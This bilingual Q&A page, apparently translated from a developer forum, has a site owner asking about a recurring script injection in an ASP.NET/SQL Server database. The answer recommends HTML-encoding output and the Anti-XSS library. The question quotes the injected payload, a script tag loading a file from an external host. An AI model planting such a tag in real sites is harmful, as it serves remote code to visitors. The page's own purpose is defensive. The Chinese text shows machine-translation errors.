XSS攻击的ASP.NET网站 [英] XSS Attack on the ASP.NET Website

查看:100
本文介绍了XSS攻击的ASP.NET网站的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着小编来一起学习吧!

问题描述

我在一个非常大的麻烦。请大家帮帮忙!!!!!!!!!!

I am in a very big trouble. Please help!!!!!!!!!!

我的网站被攻击被一些恶意脚本< / TITLE>< SCRIPT SRC =的http:// google-stats50.info/ur.php>。这个脚本会自动附加到某些表的任何列(S)。我已删除此脚本。但数小时后,它重新出现在一些表。但这次为< / TITLE>< SCRIPT SRC =的http:// google-stats49.info/ur.php>

My website has been attacked by some malicious script < / title> < script src = http : // google-stats50.info/ur.php >. This script is appended to any column(s) of some table automatically. I have removed this script. But after a few hours, it re-appeared in some tables. But this time it is < / title> < script src = http : // google-stats49.info/ur.php >.

我的客户抱怨的脚本。使用的技术是ASP.NET 1.1,SQL Server 2005中。

My client is complaining about the script. Technology used is ASP.NET 1.1, SQL SERVER 2005.

请帮忙。

在此先感谢!!!!!!

Thanks in advance!!!!!!

推荐答案

当您呈现来自你可以用两种方式来避免这种脚本的数据库中的文本。

When you render the text from the database you can use two ways to avoid this script.


  1. 服务器。 HtmlEn code(DataFromDatabase) ;

  2. 使用微软反跨dll库具有相似更多的选择功能。

  1. User Server.HtmlEncode(DataFromDatabase);
  2. Use the Microsoft Anti-Cross dll library that have a similar function with more options.

<一个href=\"http://www.microsoft.com/downloads/en/details.aspx?FamilyID=051EE83C-5CCF-48ED-8463-02F56A6BFC09&displaylang=en\"相对=nofollow>上次MS防XSS库现在是3.1。结果
如何利用视频

他们是如何通过这个脚本。

How they pass this script.


  1. 在接触或其他形式。

  2. 在上,当他们浏览你的网站,你保持这个日志,当你去看看这个登录脚本运行的统计数据浏览器参考。

希望这有助于。

这篇关于XSS攻击的ASP.NET网站的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!

查看全文
登录 关闭
扫码关注1秒登录
发送“验证码”获取 | 15天全站免登陆